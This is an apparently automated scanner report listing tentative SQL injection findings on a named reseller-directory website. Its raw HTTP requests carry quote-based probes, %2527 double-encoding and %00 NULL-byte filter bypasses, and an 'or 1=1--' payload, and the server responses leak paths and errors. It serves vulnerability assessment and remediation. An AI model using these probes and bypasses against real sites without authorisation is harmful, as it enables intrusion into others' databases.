SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.resellerbase.com/admin/ [COOKIE_SORT_BY cookie] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/admin/

Issue detail

Request 1

GET /admin/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Found
Date: Thu, 18 Nov 2010 01:17:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Location: http://www.resellerbase.com/login.php?f=1&b=%2Fadmin%2F
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

1.2. http://www.resellerbase.com/sendmail.php/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/sendmail.php/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sendmail.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...

1.3. http://www.resellerbase.com/tag/adult [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

Request 1

GET /tag'/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.4. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

Request 1

GET /tag'/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.5. http://www.resellerbase.com/tag/travel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

Request 1

GET /tag'/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.6. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=rachelew HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.7. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the COOKIE_SORT_BY cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=rubikasuss HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%2527; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.8. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php?u=weskemots HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%00'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.9. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=roomma HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc'; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=roomma HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc''; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.10. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_ORDER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the COOKIE_SORT_ORDER cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=mason33jewell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%2527; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=mason33jewell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%2527%2527; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.11. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_ORDER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php?u=skobak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%00'; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=skobak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%00''; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.12. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. The payloads 69795934'%20or%201%3d1--%20 and 69795934'%20or%201%3d2--%20 were each submitted in the COOKIE_SORT_ORDER cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user_detail.php?u=roreevoweva HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc69795934'%20or%201%3d1--%20; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />
<br />
<b>Warning</b>: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />
<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/filters/filter.gzip_compression.php</b> on line <b>0</b><br />

Request 2

GET /user_detail.php?u=roreevoweva HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc69795934'%20or%201%3d2--%20; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<link href="http://www.resellerbase.com/themes/kosmos/styles.css" rel="stylesheet" type="text/css" />
<link href="http://www.resellerbase.com/themes/kosmos/calendar-system.css" rel="stylesheet" type="text/css" />
<base href="http://www.resellerbase.com/" />
</head>
<body>
<table width="770" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>



<table width="770" border="0" cellspacing="0" cellpadding="0">
<tr>
<td valign="middle" style="background-image: url('http://www.resellerbase.com/themes/kosmos/images/template_01.gif')" height="18">
<div align="right">
<a href="http://www.resellerbase.com/" class="top_menu">Home</a> | 
<a href="http://www.resellerbase.com/cp/" class="top_menu">My Account</a> | 
<a href="http://www.resellerbase.com/power_search.php" class="top_menu">Power Search</a> | 
<a href="http://www.resellerbase.com/register.php" class="top_menu">Register</a> | 
<a href="http://www.resellerbase.com/user_search.php?pflag=search" class="top_menu">Member List</a> | 
<a href="http://www.resellerbase.com/suggest_category.php" class="top_menu">Suggest Category</a> 
</div>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="http://www.resellerbase.com/themes/kosmos/images/logo.gif" width="218" height="78" border="0" alt="" /></td>
<td><a href="http://www.resellerbas
...[SNIP]...

1.13. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php?u=tatumal HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%00';

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=187614a5c9458cc396f2ba1d48006e50; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.14. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=tarekchoudhury HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%2527;

Response 1

HTTP/1.1 200 OK
